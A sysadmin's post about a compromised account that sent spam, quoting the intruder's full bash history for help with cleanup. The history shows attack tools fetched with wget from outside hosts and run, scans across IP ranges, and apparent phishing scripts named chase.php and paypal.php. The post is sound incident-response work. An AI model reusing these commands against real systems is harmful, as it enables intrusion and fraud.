I recently noticed that a system I am responsible for was sending out a bunch of spam messages. I logged into it and sure enough it was a cracked user account which was responsible. I immediately locked down SSHD to certain users with strong passwords (should have done this before, I know), killed the offending processes and looked for replaced executables. Fortunately, the "hacker" (more like script kiddie) was not able to get access to root by the look of it. Also they managed to not delete their .bash_history file. It appears the programs he was downloading and running were meant to brute force crack passwords and look for Samba vulnerabilities. The system definately is not sending anymore spam but I am not convinced that I have undone everything that was done. Take a look at the bash history and let me know what you think. ## BEGIN BASH HISTORY ./scan 12.120 ./scan 12.121 ./scan 12.106 ./scan 12.108 ps ax pwd cd .. ls rm -rf fuckers/ own.tgz www.pdf .t ls ls la ls -la passwd w uname -a cd /tmp wget wget cbac.3x.ro/www/www.pdf tar xzvf www.pdf cd .t ./aVe ./ave ./aVe ./elflbl ./elflbl w php -v cd /tmp ps ax uname -a cd /tmp wget toxic.sapte.ro/own.tgz tar xzvf own.tgz cd fuckers/ ./scan 129.2 ls rm -rf 129.* 69.* vuln.txt lks l ls screen screen -r killall -9 screen screen -wipe ls pwd cd .. ls sendmail qmail ps ax killall -9 elflbl ps ax wget w cd /tmp ls cd /dev/shm ls mkdir a rm -rf a wget wget ftp://mihaita:alwayssprite@mihaita.netfirms.com/www/nt.tar wget ftp://mihaita:alwayssprite@mihaita.netfirms.com/cgi-bin/nt.tar tar xzvf nt.tar cd nt ls ./ss 150.0.0.0/16 ./s 150.0.0.0/16 screen cd /tmp php -v wget scp vpopmail at 203.197.97.162:/tmp/sc.tgz /tmp screen -r tar xzvf sc.tgz cd .Chase/ php chase.php list.txt ps ax screen -r cd /tmp ls cd .Chase/ ls scp test at 220.117.204.90:/tmp/a/a3.txt /tmp/.Chase/ scp test at 220.117.204.90:/tmp/a/a4.txt /tmp/.Chase mv a3.txt list.txt cat a4.txt >> list.txt rm -rf a4.txt screen ps ax screen =-r screen -r screen -r 24034 screen -r 9718 screen -r 9718 cd /tmp cd .Chase/ ls rm -rf list.txt ls rm -rf list.txt scp test at 220.117.204.90:/tmp/a/mihai2.txt /tmp/.Chase/ pico mihai2.txt nano mihai2.txt scp test at 220.117.204.90:/tmp/a/mihai.txt /tmp/.Chase/ nano mihai.txt mv mihai.txt list.txt cat mihai2.txt >> list.txt rm -rf mihai2.txt screen -r 9718 screen -r screen -r 24034.pts-0.ndxmail screen -r screen -r 24034.pts-0.ndxmail curl --help cd /tmp ls wget ftp://ciungu:123qwe@ciungu.netfirms.com/www/Linuxvld.tgz tar xzvf Linuxvld.tgz ls cd validator/ ls rm -rf invalide.txt valide.txt ./validator.sh ls rm -rf invalide.txt list.txt valide.txt ls ftp php chase.php list.txt php chase.php list.txt cd /dev/shm ls cd /tmp cd validator/ ls ls -la ls mv l25.txt list.txt ls screen -r screen -r 9718.pts-0.ndxmail kill -9 9718 screen -r ls screen screen -r screen -r 14426.pts-0.ndxmail /tmp cd v cd /dev/shm cd va ls cd /tmp[ ls cd /tmp ls cd validator/ ls nano valide.txt screen -r screen -r 14426.pts-0.ndxmail cd /v cd /derbv/sjhm cd /dev/shm ls cd /tymp cd /tmp cd validator/ ls nano valide.txt screen -r screen -r 14426.pts-0.ndxmail cd /tmp cd l ls cd validator/ ls nano valide.txt mv valide.txt s4.txt ftp ls rm -rf s4.txt list.txt invalide.txt ./validator.sh w who -q cd /tmp ls -la screen -r screen -r 24034.pts-0.ndxmail screen -r 14426.pts-0.ndxmail kill -9 14426.pts-0.ndxmail ls kill -9 14426 ls ls -la scp test at 220.117.204.90:/tmp/send.tgz /tmp tar xzvf send.tgz cd .Ss rm -rf lis cd .SS rm -rf list.txt scp root at 200.168.58.88:/tmp/.SS/list.txt /tmp/.SS/ screen ps ax php paypal.php lu php paypal.php list.txt w screen -r screen -r 24034.pts-0.ndxmail screen -r 24064.pts-0.ndxmail kill -9 24064 cd /tmp wget talentat.100free.com/w00t.tgz ftp ftp ls www.geocities.com/jbj20_01/w00t.tgz wget www.geocities.com/jbj20_01/w00t.tgz tar xzvf w00t.tgz cd w00t ls ./auto ./auto ls ./auto chmod +x 209 ./209 ./asmb 64.251 cd /tmp cd ww cd wq cd w00t ls screen -r screen 12.106.4.204 ls cd .. ls ftp screen -r screen -r 24034.pts-0.ndxmail screen -r 13181.pts-0.ndxmail kill -9 13181 ./s 150.0.0.0/16 ./s 150.80.0.0/16 ./s 150.140.0.0/16 ./scan 164.20.0.0/16 ./s 164.20.0.0/16 ./s 164.80.0.0/16 ./s 164.90.0.0/16 ./s 164.100.0.0/16 ## END BASH HISTORY -- Loren H. Burlingame <loren at lhb.name> GPG Key ID: 0x112DCF4F "Irony can be pretty ironic sometimes." -William Shatner (a.k.a. Buck Murdock)